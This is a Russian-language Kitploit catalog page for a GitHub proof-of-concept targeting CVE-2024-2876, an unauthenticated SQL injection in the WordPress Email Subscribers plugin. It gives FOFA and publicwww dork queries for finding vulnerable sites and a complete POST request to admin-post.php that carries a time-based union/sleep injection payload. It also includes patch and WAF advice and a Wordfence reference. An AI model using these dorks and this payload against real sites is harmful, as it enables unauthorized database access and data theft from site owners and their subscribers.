Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-2876 — Proof-of-concept для CVE-2024-2876 — неаутентифицированная SQL-инъекция в WordPress-плагине Email Subscribers, с dork-запросами и рабочим эксплойт-запросом. | Kitploit
Инструменты/GitHubGitHub/babydessy/cve-2024-2876
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubbabydessy/cve-2024-2876

CVE-2024-2876

Proof-of-concept для CVE-2024-2876 — неаутентифицированная SQL-инъекция в WordPress-плагине Email Subscribers, с dork-запросами и рабочим эксплойт-запросом.

Репозиторий
112 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-2876

#Описание уязвимости: Плагин Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce для WordPress уязвим к SQL-инъекции через функцию ‘run’ класса ‘IG_ES_Subscribers_Query’ во всех версиях вплоть до 5.7.14 включительно из-за недостаточного экранирования предоставляемого пользователем параметра и отсутствия достаточной подготовки существующего SQL-запроса. Это позволяет неаутентифицированным злоумышленникам добавлять дополнительные SQL-запросы к уже существующим запросам, что может быть использовано для извлечения конфиденциальной информации из базы данных.

#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE

#Как исправить? Поскольку во всех версиях вплоть до 5.7.14 была обнаружена данная CVE, пользователям рекомендуется обновить плагин Email Subscribers by Icegram Express до версии 5.7.15 (или последней версии 5.7.19). Пользователи Patchstack имеют возможность включить автоматические обновления специально для уязвимых плагинов. Внедрите решение WAF/WAAP в качестве дополнительного уровня защиты. Преимущество таких решений заключается в том, что даже если уязвимость новая и неизвестная (0-day), оно всё равно может предотвратить атаки, обнаруживая шаблоны и техники эксплуатации.

#Ресурсы: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

Скачать инструмент